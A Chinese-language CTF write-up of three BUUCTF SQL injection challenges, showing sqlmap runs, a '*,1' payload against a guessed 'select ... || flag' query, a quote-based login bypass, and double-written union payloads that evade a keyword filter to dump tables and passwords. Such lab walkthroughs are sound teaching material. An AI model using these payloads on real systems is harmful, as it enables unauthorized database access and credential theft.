• BUU SQL COURSE 1

• 1

  

• 实例无法访问 / Instance can't be reached at that time | BUUCTF
• 但是这个地方很迷惑就是这个 一个 # 我们不抓包就不知道这个是sql注入类的
• 判断是 get 类型的sql注入直接使用sqlmap
• 我们放入到1.txt中

  

• 目的是 优先检测 ?id=1
• >python3 sqlmap.py -r 1.txt

• 

• 他会自动的进行检测 对方的数据库类型

  

• 直接进行数据搜哈

  

• 这个加密是 24英文字母小写是MD5

  

• 解密不出来 那就说明这个pass就是密码

  

• flag{19a949af-93af-4422-a127-87b23a68c134}

• [SUCTF 2019]EasySQL1

• 

• 老办法复制一下然后 放到1.txt（这个文件需要和sqlmap是同级的文件）
• 标上 *

  

• 发现梭哈失败了 原因 ：1、这个过程中经过了 服务器的解密
• 2、有waf
• 第一种排除了 是第二种 有waf过滤

  

• 输入字母就会无回显但是输入数字

  

• 有个Array 这个在php中是数组的意思
• 也就是我们可以输入一个数组 这个[0] 猜测是 $flag=array[xxxxxxxx]
• 输入1
• 会出现 [0]=1
• 但是输入 0时会消失
• 输入0和1 发现我们输入什么他就会回显什么

  

• 猜测后端的逻辑
• 我发现一个规律就是 我输入多少个数组 最后一个都是 1

  

• 后端逻辑 ： select $_POST['query'] || flag from Flag
• 可能就是当我们输入这个flag是正确的时候就会出现flag 这个很明显不显示
• 但是我们可以使用 * 让其列出所以的列 然后 ,1 构造这个数组
• select *,1 || flag from Flag
• 1 || flag
• 就是作用类似于 1 or 1 =1
• select * 是查找所以的值
• 在mysql中 || 就是或运算符的意思
• 1 or 一个值的逻辑必然是 true
• 因为1是真实存在的
• 但是如果我们输入的flag不是真实存在的就鸡鸡了 但是这个又过滤了字母 所以说这样做事最正确的

• [极客大挑战 2019]BabySQL

• 判断类型

  

• 使用逻辑注入 '= \ '=
• 获取当账号密码

  

• 猜测是MD5

  

• 失败 那就说明 passwd就是这个
• 但是这个不是 flag
• 根据题目提示 bodysql 但是我们不知道是哪个地方的注入抓个包直接使用sqlmap一键梭哈一下
• 发现失败了
• python3 sqlmap.py -r 1.txt --level=4
• 说明可能又有waf

  

• 

• 这个双写过滤的逻辑就是 服务器的替换是只能不断向前替换的 不能回头 bbyy 他首先会把 by 换为 ' ' 只能他是不能回头把 b y 进行替换

  

• 发现这样构造还是没有 所以就使用手工注入 使用 union 看一下他到底有几个列

  

• 发现一共是有 3个数据的

  

• 有个知识点就是 不能在url中使用 # 要使用 %23 不然会造成不识别
• 查表
• ?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23

  

• http://6304b807-b309-4f6c-8c46-58857e48ae51.node5.buuoj.cn:81/check.php?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_schema=database()%23

  

• 发现这个有两个id 应该不是的
• 直接找密码
• ?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql%23